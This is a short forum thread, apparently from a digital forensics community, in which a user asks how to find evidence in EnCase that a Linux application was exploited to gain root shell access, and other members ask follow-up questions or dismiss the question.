exploit evidence fr...
 
Notifications
Clear all

exploit evidence from encase  

  RSS
afsfr
(@afsfr)
Junior Member

we collect Linux image in encase, we suspect one of Linux application is exploited and attacker got root shell access through exploit, is there any way to find evidence of exploit in encase? thanks

Quote
Posted : 12/12/2019 9:35 am
keydet89
(@keydet89)
Community Legend

we collect Linux image in encase, we suspect one of Linux application is exploited and attacker got root shell access through exploit, is there any way to find evidence of exploit in encase? thanks

What's the Linux version?

What is the application?

ReplyQuote
Posted : 12/12/2019 11:55 am
Rich2005
(@rich2005)
Senior Member

we collect Linux image in encase, we suspect one of Linux application is exploited and attacker got root shell access through exploit, is there any way to find evidence of exploit in encase? thanks

What's the Linux version?

What is the application?

I could be wrong but I think (due to language barrier) he's saying they don't know the method of entry and basically wants to know how to do an intrusion investigation in EnCase (ie not one specific app).

ReplyQuote
Posted : 12/12/2019 12:37 pm
Bunnysniper
(@bunnysniper)
Active Member

I could be wrong but I think (due to language barrier) he's saying they don't know…

Please have a look at his other questions. We are facing a person, who does not even have beginner knowledge in digital forensics and is too lazy to read about the basics. "Don`t feed the troll" - my 2 cent.

regards, Robin

ReplyQuote
Posted : 12/12/2019 12:47 pm
afsfr
(@afsfr)
Junior Member

we collect Linux image in encase, we suspect one of Linux application is exploited and attacker got root shell access through exploit, is there any way to find evidence of exploit in encase? thanks

What's the Linux version?

What is the application?

I could be wrong but I think (due to language barrier) he's saying they don't know the method of entry and basically wants to know how to do an intrusion investigation in EnCase (ie not one specific app).

I have a vulnerable application, Linux kernel also out of dated, I need to provide evidence for initial shell access, I 'm not sure the shell access by hacker is through which exploit (which script hacker used? through buffer overflow or LSASS exploit? OS or application level?), the compromise didn't cause application malfunction, but hacker gain shell access to our LONDON data center Linux machine and further escalate to root. so the first step intrusion evidence (remote shell access)I need to collect, you are right

ReplyQuote
Posted : 13/12/2019 7:52 am
Share: